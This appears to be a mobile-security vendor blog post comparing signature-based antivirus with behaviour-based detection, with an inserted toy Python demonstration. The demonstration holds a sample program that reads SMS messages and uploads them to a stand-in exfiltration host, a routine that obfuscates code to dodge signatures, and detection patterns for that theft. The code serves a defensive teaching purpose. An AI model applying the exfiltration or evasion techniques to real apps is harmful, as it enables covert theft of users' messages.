Hack In The Box: Mobile Malware Goes In For The Kill

For attackers, installing a Trojan on a mobile device is the most effective way to compromise it. Mobile malware gives attackers a full arsenal of capabilities for surveillance, information theft, ransomware, fraud and more. Surveillance malware, for instance, can track location; extract call logs, files and SMS messages; log keystrokes; take screenshots; and record audio and video through the device microphone and camera. Each of these features, however, requires corresponding code in the app, and that code is what a defender has to find.

Malware writers do their best to disguise the incriminating code. Even legitimate apps read like a tangled map with virtually infinite routes: application logic is complex, and it is hard to tell whether a given path is malicious. To identify such segments, mobile anti-virus relies on signature-based detection, matching all or part of an app against patterns (file hashes, byte sequences, strings) derived from known malicious samples.


Anti-virus products have several shortcomings that limit how well they protect users against malware. Because signatures are static, malware developers can bypass them with minor code modifications, typically obfuscation or encryption of the parts the signature matches. Some malware writers test their samples against a range of AV engines to confirm that the altered code evades detection before releasing it. Moreover, signature-based solutions cannot identify or stop threats they have not encountered before. The ideal security solution should therefore incorporate the following capabilities:

  • Capture and reverse-engineer apps for code-flow analysis to expose any suspicious behavior.
  • Automate responses and user notifications with remediation steps to remove the malware.
  • Dynamically trigger device policy changes in your MDM or EMM solution.
  • Block traffic to malicious servers to contain the attack.
  • Detect and mitigate unknown threats.

Unlike AVs, advanced threat prevention solutions analyze and reverse-engineer apps to understand what they actually do. Because this analysis detects the malicious activity itself rather than a particular structure in the code, it is far less sensitive to code changes and obfuscation: an attacker has to change the behavior, not just its representation, to evade it. This lets such solutions detect and mitigate unknown threats, not just known code samples, a crucial capability as previously unseen malware emerges at an increasing rate. Advanced solutions can identify and block not only outright malicious actions but also risky app behaviors that can lead to data loss.
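The two detection models contrasted above (static signatures in the paragraph on AV shortcomings, behavior analysis in this one), as an added Python example that is not code from the original post or from any Check Point product. The instruction format, the "spyware" and "benign" samples, the indicator strings and the API names are all constructed for the illustration. The behavioral rule executes the toy program and inspects the API calls it makes, so the same obfuscation (string encryption, junk instructions, register renaming) that breaks the hash and string signatures leaves it unaffected.

```python
"""Signature vs. behaviour-based detection on a constructed toy 'app' format.

Not real Android bytecode: each line is one instruction in a made-up format.
    CONST <reg> "<text>"   load a string constant into a register
    ENC   <reg> <hex>      load an XOR-encrypted string constant (obfuscated form)
    XOR   <reg> <key>      decrypt the register's string in place (byte-wise XOR)
    CALL  <api> <reg...>   invoke a (fake) platform API with register arguments
    NOP                    junk instruction
"""
import hashlib
import re

# Constructed spyware sample: reads the SMS inbox and uploads it to a C2 server.
SPYWARE = b"""\
CONST r0 "content://sms/inbox"
CALL ContentResolver.query r0
CONST r1 "http://exfil.example.invalid/upload"
CALL HttpURLConnection.connect r1
CALL OutputStream.write r0
"""

# Constructed benign sample: talks to the network but never touches SMS.
BENIGN = b"""\
CONST r0 "https://api.example.invalid/weather"
CALL HttpURLConnection.connect r0
CALL OutputStream.write r0
"""

# Static signatures an AV might ship for the known sample: its file hash plus
# two literal indicators (the SMS provider URI and the C2 hostname).
KNOWN_HASHES = {hashlib.sha256(SPYWARE).hexdigest()}
INDICATORS = [re.compile(rb"content://sms/inbox"), re.compile(rb"exfil\.example")]


def signature_scan(sample: bytes) -> bool:
    """Classic AV check: exact hash match, or a known byte pattern in the file."""
    if hashlib.sha256(sample).hexdigest() in KNOWN_HASHES:
        return True
    return any(p.search(sample) for p in INDICATORS)


def obfuscate(program: bytes, key: int = 0x5A) -> bytes:
    """The minor changes a malware author makes to break signatures: encrypt
    every string constant, pad with junk instructions, rename registers.
    The program's behaviour is unchanged."""
    out = []
    for line in program.decode().splitlines():
        m = re.match(r'CONST (\w+) "(.*)"', line)
        if m:
            reg, text = m.groups()
            enc = bytes(b ^ key for b in text.encode()).hex()
            out.append(f"ENC {reg} {enc}")
            out.append(f"XOR {reg} {key}")
        else:
            out.append(line)
        out.append("NOP")
    renamed = "\n".join(out).replace("r0", "v7").replace("r1", "v3")
    return renamed.encode() + b"\n"


def run_and_trace(program: bytes):
    """Execute the toy program and record each API call with its *decrypted*
    arguments: the behaviour is visible however the strings were stored."""
    regs, trace = {}, []
    for line in program.decode().splitlines():
        if not line.strip():
            continue
        op, *args = line.split()
        if op == "CONST":
            regs[args[0]] = " ".join(args[1:]).strip('"')
        elif op == "ENC":
            regs[args[0]] = bytes.fromhex(args[1]).decode("latin-1")
        elif op == "XOR":
            key = int(args[1])
            regs[args[0]] = "".join(chr(ord(c) ^ key) for c in regs[args[0]])
        elif op == "CALL":
            trace.append((args[0], tuple(regs[r] for r in args[1:])))
        elif op != "NOP":
            raise ValueError(f"unknown instruction {op!r}")
    return trace


def behaviour_scan(program: bytes) -> bool:
    """Behavioural rule: SMS provider read, then a network connection, then data
    written to it. Matches the activity, not any particular byte layout."""
    read_sms = connected = False
    for api, args in run_and_trace(program):
        if api == "ContentResolver.query" and args and args[0].startswith("content://sms/"):
            read_sms = True
        elif api == "HttpURLConnection.connect" and args and args[0].startswith("http"):
            connected = True
        elif api == "OutputStream.write" and read_sms and connected:
            return True
    return False


def compare(sample: bytes) -> dict:
    return {"signature": signature_scan(sample), "behaviour": behaviour_scan(sample)}


if __name__ == "__main__":
    for name, sample in [("spyware", SPYWARE), ("obfuscated", obfuscate(SPYWARE)), ("benign", BENIGN)]:
        print(f"{name:11} {compare(sample)}")
```

Run as a script, it reports both checks firing on the original sample, only the behavioural check firing on the obfuscated copy, and neither on the benign app. Two caveats carry over to real engines: a signature on the API names rather than on strings would survive this particular transformation (which is why real obfuscators also rename classes and route calls through reflection), and a behavioural rule is only as good as its model of dangerous activity, so a legitimate SMS backup app that uploads messages would trip this one and needs handling as a false positive.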

Mitigation actions taken by advanced threat prevention solutions can be automated so that mobile security is managed simply and effectively. Blocking communication with malicious servers while the infection is remediated contains the attack and lets users keep working on their devices with minimal interruption. With an MDM or EMM solution in place, policy changes can also be enforced across the mobile fleet to protect it both from poorly implemented apps and from outright malware.

To learn more about the major threats facing mobile devices in the enterprise, read our CISO's Guide to Mobile Security.